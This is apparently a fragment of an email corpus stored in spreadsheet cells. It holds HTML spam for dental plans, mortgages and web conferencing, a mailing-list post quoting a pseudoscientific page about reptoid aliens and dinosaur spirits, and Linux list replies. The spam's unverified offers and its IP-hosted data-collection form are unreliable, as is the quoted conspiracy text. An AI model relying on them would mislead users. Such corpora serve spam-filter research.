 &lt;td width=1 height=108 bgcolor=#000000&gt;&lt;img src="_blnk.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=252 height=108 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=245&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=100&gt;&lt;/td&gt;
 &lt;td width=245 height=100 valign=top align=left&gt;
 &lt;p align=left&gt;&lt;font face="Verdana" color=#000000 size=2&gt;&lt;I&gt;&lt;B&gt;A Variety Of Plan Choices 
 Nationwide&lt;br&gt;&lt;br&gt;Dental Plans For Individuals 
 and Employer Groups&lt;br&gt;&lt;/B&gt;&lt;/I&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td width=1 height=108 bgcolor=#000000&gt;&lt;img src="_blnk.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=255 height=1 colspan=3 bgcolor=#000000&gt;&lt;img src="_blnk.gif" width=255 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td colspan=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=2&gt;&lt;/td&gt;
 &lt;td colspan=8&gt;&lt;/td&gt;
 &lt;td colspan=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=14&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=319&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;td width=498 height=319 colspan=9 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=498 height=319 valign=top align=left bgcolor=#ffffff&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=490&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=311&gt;&lt;/td&gt;
 &lt;td width=490 height=311 valign=top align=left&gt;
 &lt;p align=left&gt;&lt;font face="Arial" color=#000000 size=3&gt;&lt;B&gt;You can choose from traditional dental insurance 
 that lets you see any dentist you 
 wish, or if you do not have your own private dentist, choose one of our plans that offer dental coverage 
 from&amp;nbsp; pre-screened dental offices 
 and save hundreds of dollars on your dental treatment.&lt;br&gt;&lt;/B&gt;&lt;/font&gt;&lt;font face="Arial" 
 size=3&gt;&lt;br&gt;&lt;/p&gt;&lt;p 
 align=center&gt;&lt;center&gt;&lt;/font&gt;&lt;font face="Arial" size=3&gt;&lt;I&gt;Dental Plans With No 
 Deductibles.&lt;br&gt;&lt;center&gt;Dental Plans That Cover 
 Orthodontics&lt;br&gt;&lt;center&gt;Should You Need To See A Dentist Right 
 Away...&lt;br&gt;&lt;center&gt;&lt;br&gt;&lt;/center&gt;&lt;/p&gt;&lt;p align=left&gt;&lt;/I&gt;&lt;/font&gt;&lt;font 
 face="Arial" size=3&gt;&lt;br&gt;&lt;/font&gt;&lt;font face="Arial" size=2&gt;&lt;br&gt;&lt;/font&gt;&lt;font face="Arial" size=3&gt;&lt;a 
 href="http://www.firstdentalplans.com"&gt;To 
 Compare Plans Benefits And Rates, Click Here&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face="Arial" size=1&gt;To be 
 removed from this emailing list, please 
 reply to this message by clicking on &lt;a 
 href="mailto:remove@firstdentalplans.com"&gt;REMOVE&lt;/a&gt;&lt;br&gt;&lt;/font&gt;&lt;font face="Arial" 
 size=3&gt;&lt;br&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=6&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=54&gt;&lt;/td&gt;
 &lt;td colspan=6&gt;&lt;/td&gt;
 &lt;td width=222 height=54 colspan=3 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=214&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=46&gt;&lt;/td&gt;
 &lt;td width=214 height=46 valign=top align=left&gt;
 &lt;p align=center&gt;&lt;center&gt;&lt;font face="Elephant" color=#000000 size=2&gt;First American Dental 
 Plans&lt;br&gt;&lt;center&gt;&lt;a 
 href="http://www.firstdentalplans.com"&gt;www.firstdentalplans.com&lt;/a&gt;&lt;br&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td colspan=4&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=12&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=556 height=24 colspan=14 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=549&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=16&gt;&lt;/td&gt;
 &lt;td width=549 height=16 valign=top align=left&gt;
 &lt;p align=center&gt;&lt;center&gt;&lt;font face="Arial" color=#000000 size=2&gt;&lt;I&gt;To contact us:&lt;br&gt;&lt;/I&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=6&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=556 height=66 colspan=14 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=549&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=58&gt;&lt;/td&gt;
 &lt;td width=549 height=58 valign=top align=left&gt;
 &lt;p align=center&gt;&lt;center&gt;&lt;font face="Arial" color=#000000 size=2&gt;Phone: 800-711-8817&lt;br&gt;&lt;center&gt;Fax: 
 800-752-4040&lt;br&gt;&lt;center&gt;Email: 
 &lt;a href="mailto:sales@firstdentalplans.com"&gt;sales@firstdentalplans.com&lt;/a&gt;&lt;br&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=6&gt;&lt;/td&gt;
 &lt;td colspan=13&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=556 height=48 colspan=14 rowspan=1 valign=top align=left&gt;
 &lt;table border=0 cellpadding=0 cellspacing=0&gt;
 &lt;tr&gt;
 &lt;td width=3 height=3&gt;&lt;/td&gt;
 &lt;td width=549&gt;&lt;/td&gt;
 &lt;td width=3&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=40&gt;&lt;/td&gt;
 &lt;td width=549 height=40 valign=top align=left&gt;
 &lt;p align=center&gt;&lt;center&gt;&lt;font face="Arial" color=#000000 size=2&gt;1525 Mesa Verde East, Suite 
 107&lt;br&gt;&lt;center&gt;Costa Mesa, CA&amp;nbsp; 
 92626&lt;br&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td height=3&gt;&lt;/td&gt;
 &lt;td colspan=2&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;a name=bottom&gt;&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Dinosaurs Eggs and the Origins of Good and Evil
</t>
  </si>
  <si>
    <t xml:space="preserve">Neat stuff. Seems to combine elements of Scientology/Xenu and
 David Icke (http://www.davidicke.com/icke/temp/reptconn.html).
 - Gordon
 ----- Original Message ----- 
 From: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;
 To: &lt;fork@spamassassin.taint.org&gt;
 Sent: Monday, September 30, 2002 10:11 PM
 Subject: Dinosaurs Eggs and the Origins of Good and Evil
 &gt; One of the most bizarre pages I've seen on the Web. At first I thought it
 &gt; might be some sort of back-story to a RPG, but, nope, it looks like somebody
 &gt; believes this.
 &gt; 
 &gt; ===
 &gt; http://www.viking-z.org/r20i.htm
 &gt; 
 &gt; M09. Dinosaurs Eggs and the Origins of Good and Evil.
 &gt; DINOSAURS. Reptoid ETs are reported to be 12 foot high crocodiles walking on
 &gt; their hind legs. This is a description of a dinosaur. It now appears in
 &gt; Remote Viewing that the Reptoid ETs, dinosaurs and dragons are all linked
 &gt; together and that they all originated on Earth. The Erideans who are Reptoid
 &gt; derivatives have a home planet (in the Eridanus system) like all other ETs.
 &gt; The Reptoids have no reported home planet. They also come over as entities
 &gt; with little brain who control their bodies directly by spirit. This is a
 &gt; description of a ghost or disincarnate entity regardless of how people see
 &gt; them. Thus it could be that the Reptoids, Erideans, Nordics, Anunnaki, but
 &gt; not the Greys, all have origins on Earth and have a strong link to Earth
 &gt; even if they choose to live elsewhere. The Greys do not appear to have a
 &gt; renal or urinary system and this points to them not originating on Earth.
 &gt; The definitive work on dragons is "The Flight of Dragons" by Peter
 &gt; Dickinson. If dragons did exist in the flesh, they did not survive the long
 &gt; bow. Targets do not come much bigger.
 &gt; 
 &gt; Truth is stranger than fiction. Thus the writer's current scenario is that
 &gt; there were a race of dinosaurs which developed psychic intelligence to guard
 &gt; their eggs and young, and who probably preferred to live underground. They
 &gt; survived the wipe out of the dinosaurs 50 million years ago with difficulty.
 &gt; They evolved into the Erideans and transferred to a more hospitable planet
 &gt; (for them) possibly with the help of another race of ETs who wanted slaves
 &gt; but otherwise had no interest in Earth or mind control.
 &gt; 
 &gt; Thus it appears that the current Reptoids are the Spirits or ghosts of the
 &gt; dinosaurs. They must have been powerful to survive 50 million years and also
 &gt; to appear to some people. They have appeared to the writer in remote
 &gt; viewing. They are living on as vampire entities. Such immortal minds are
 &gt; contagious and can easily jump race and species barriers. If they can be
 &gt; encouraged to reincarnate, then the power sources of the black magicians and
 &gt; mind controllers will disappear. Encouraging them to reincarnate will help
 &gt; so called immortal minds to disappear as immortal minds have great
 &gt; difficulty surviving reincarnation. Purging people's dinosaurs should remove
 &gt; all perverse psychic abilities not under their control. They are a source of
 &gt; Satanic Guardian Angels and demons. They control us by owning our psi. Thus
 &gt; if we regain ownership of psi, we must relinquish their control and that of
 &gt; all other mind controllers. Encourage people to regain ownership of their
 &gt; psi.
 &gt; 
 &gt; THE ORIGINS OF LOVE, HATE AND PURE MALICE. The following scenario appears to
 &gt; hold water and can account for the origins of our Universal Subconscious.
 &gt; 
 &gt; Dinosaurs laid their eggs and buried them either underground or in piles of
 &gt; rotting vegetation (a good source of beetles and grubs for young
 &gt; hatchelings). They did not sit on their eggs to keep them warm, which made
 &gt; them very vulnerable to drastic climate and temperature change. In order to
 &gt; keep away predators some at least developed psychic mind control. To do this
 &gt; they had to capture ownership of the psi of potential predators. This is an
 &gt; act of hatred and outward looking. While a few dinosaurs did develop the
 &gt; ability to bear living young, most did not. The dinosaurs got in first and
 &gt; so their mind control tends to override all other latter minds. They have
 &gt; become the source of all Satans, devils and demons.
 &gt; 
 &gt; Birds on the other hand developed the ability to sit on their eggs and keep
 &gt; them warm. A hen bird normally lays a series of eggs (say one per day) and
 &gt; only starts sitting when the clutch is completely laid. Thus all eggs tend
 &gt; to hatch together as they all have an equal period of warmth. This is
 &gt; primarily an act of love but inward looking. Bearing live young is not
 &gt; suitable to a bird of the air. A pregnant pigeon would not fly very far.
 &gt; Antarctic penguins tuck a single egg between their legs to keep it warm,
 &gt; even if they are standing on ice.
 &gt; 
 &gt; Mammals developed live bearing of their young which is also primarily an act
 &gt; of love and inward looking. This is especially true as a mammalian female
 &gt; can not desert her young in the womb in case of emergency as can a bird
 &gt; sitting on a nest.
 &gt; 
 &gt; Dinosaurs developed hate and mind control of others to protect their young,
 &gt; while birds and mammals developed love. Birds and mammals certainly do hate
 &gt; all enemies of their young, but this is secondary.
 &gt; 
 &gt; If one wants to purge the sources of malice of say a black magician, then
 &gt; purge his dinosaurs and his dinosaur eggs. Unfortunately most of our
 &gt; religions are based on dinosaur protection of eggs and thus mind control,
 &gt; regardless of the front they put out to the public. Religion tends to
 &gt; concentrate on "How to Brainwash your Neighbour". Conscious thought has
 &gt; built many mighty empires, theologies and slave control systems out of using
 &gt; "How to care for and protect one's young" as a foundation.
 &gt; 
 &gt; Thus the foulest form of abuse possible is to call something "A load of
 &gt; dinosaur's eggs". Purging the dinosaurs and dinosaur's eggs of any entity
 &gt; tends to purge all malice back to its roots.
 &gt; 
 &gt; It looks as if mighty immortal minds have built up from small beginnings,
 &gt; aided and abetted by various occultists and other. As they will insist on
 &gt; vampiring the living for energy to avoid reincarnation and disturbing the
 &gt; serenity of the writer, he encourages them to reincarnate.
 &gt; 
 &gt; ITEMS FOR INSPECTION. For mind control to take place, then someone must take
 &gt; control or ownership of the target's psi and pleasure centres. Check for the
 &gt; following.
 &gt; 
 &gt; Nest of dinosaur's eggs, holy dinosaurs, etc.
 &gt; Eggs, controllers or owners in peoples psi, pleasure centres, pain killing
 &gt; hormones, abilities, etc.
 &gt; Mind machines.
 &gt; The original engraving or engram.
 &gt; GOD and SATAN appear to be job titles and not entities in their own right. T
 &gt; hey appear to be dinosaur engravings or engrams. No doubt dinosaurs were the
 &gt; first job holders.
 &gt; TIMETRACKS are worth investigating as our complete history from the start of
 &gt; time.
 &gt; 
 &gt; My, our, Man's timetracks, etc.
 &gt; The time tracks of the Universe, Universal Subconscious, Galactic
 &gt; Subconscious, etc.
 &gt; EXTINCT RACES of ETs can cause problems when they live on in vampire mode.
 &gt; Their virtues may known to channelers but they can also have vices. Whenever
 &gt; one hears of races which have evolved on to higher planes, suspect that the
 &gt; higher plane is a vampire one. One may never know what they looked like or
 &gt; other basic characteristics, which makes linking back a trifle difficult.
 &gt; Every extinct race, etc.
 &gt; BLOOD ANCESTORS are also worth investigating as minds can be passed down via
 &gt; genetic linkages. Some of these can be over 2,000 years old.
 &gt; Every blood ancestor, ancestral mind, genetic mind, etc.
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugene Leitl:
 &gt;Users don't like entering passphrases when sending email.
 If you're using the mail client on your personal
 machine, there's no reason you would need to enter
 a passphrase, unless that is part of how you secure
 the data on your personal machine. You're private
 key is as secure as any other data on your machine.
 If you're working remotely, you already have to
 enter a passphrase to get to your email.
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your order                1963
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"1" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
 collapse: collapse" bordercolor=3D"#111111" width=3D"511" height=3D"308" i=
 d=3D"AutoNumber1"&gt;
     &lt;tr&gt;
       &lt;td width=3D"511" height=3D"308" valign=3D"top" bgcolor=3D"#EBEBEB"&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080" size=3D"5"&gt;Shopping f=
 or a loan 
       has never been easier&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Get a free quote on a ne=
 w First 
       Mortgage, Second Mortgage, or a Credit Line with no cost or obligati=
 on.&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;We can help you get a gr=
 eat loan 
       regardless of your credit situation&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;It's a great time to buy=
  or 
       refinance your home.&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080"&gt;Whether you want to:&lt;=
 /font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Buy a new home - consoli=
 date your 
       debts&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Refinance to lower your =
 payments&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Take some equity out of =
 your home 
       for any reason&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080"&gt;We can help!&lt;/font&gt;&lt;/=
 b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080" size=3D"4"&gt;
       &lt;a href=3D"http://211.141.69.11:8111/mortgage/form.htm"&gt;Click here a=
 nd get a free quote!&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;&lt;b&gt;You have nothing to l=
 ose!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;
       &lt;a href=3D"http://211.141.69.11:8111/removes/deptoff.htm"&gt;To not rec=
 eive this 
       email again click here&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Manage your meetings virtually on line 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Multi-platform compatible &lt;/B&gt;(no software needed)
       &lt;LI&gt;&lt;B&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Unlimited usage for up to 15 participants&lt;/b&gt; (larger groups ava=
 ilabale)
       &lt;LI&gt;&lt;b&gt;Lowest rate $.18 cents per minunte for audio &lt;/b&gt;(toll charge=
 s included)
       &lt;LI&gt;&lt;b&gt;Quality, easy to use service
       &lt;LI&gt;Numerous interactive features&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks_wc1@yahoo.com?subject=3DWebC_Inquiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:d_lete141@eudoramail.com?subject=3DRemove_WebC"&gt;Cl=
 ick 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Ronan Waide &lt;waider@waider.ie&gt;:
 &gt; Sure, but soft links would do the same. To be honest, I'm trying to
 &gt; think of a useful use of hard links right now, and I'm a little
 &gt; stumped. There's gotta be some benefit that I'm missing that's
 &gt; immediately obvious to everyone.
 Using Niall's example - single set of files but &gt;1 namespace, and suppose that
 you want to delete some items from the set according to rules applied to the
 namespaces.  With soft links you need an *extra* namespace the others refer to,
 and after filtering the namespaces, you have to do a manual reference count to
 decide what goes and what stays.  With hard links, you just unlink and deletion
 is automatic.
 Ronan.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 12:09, Albert White - SUN Ireland wrote:
 &gt; If you want to stop in the middle of that because some condition is set then 
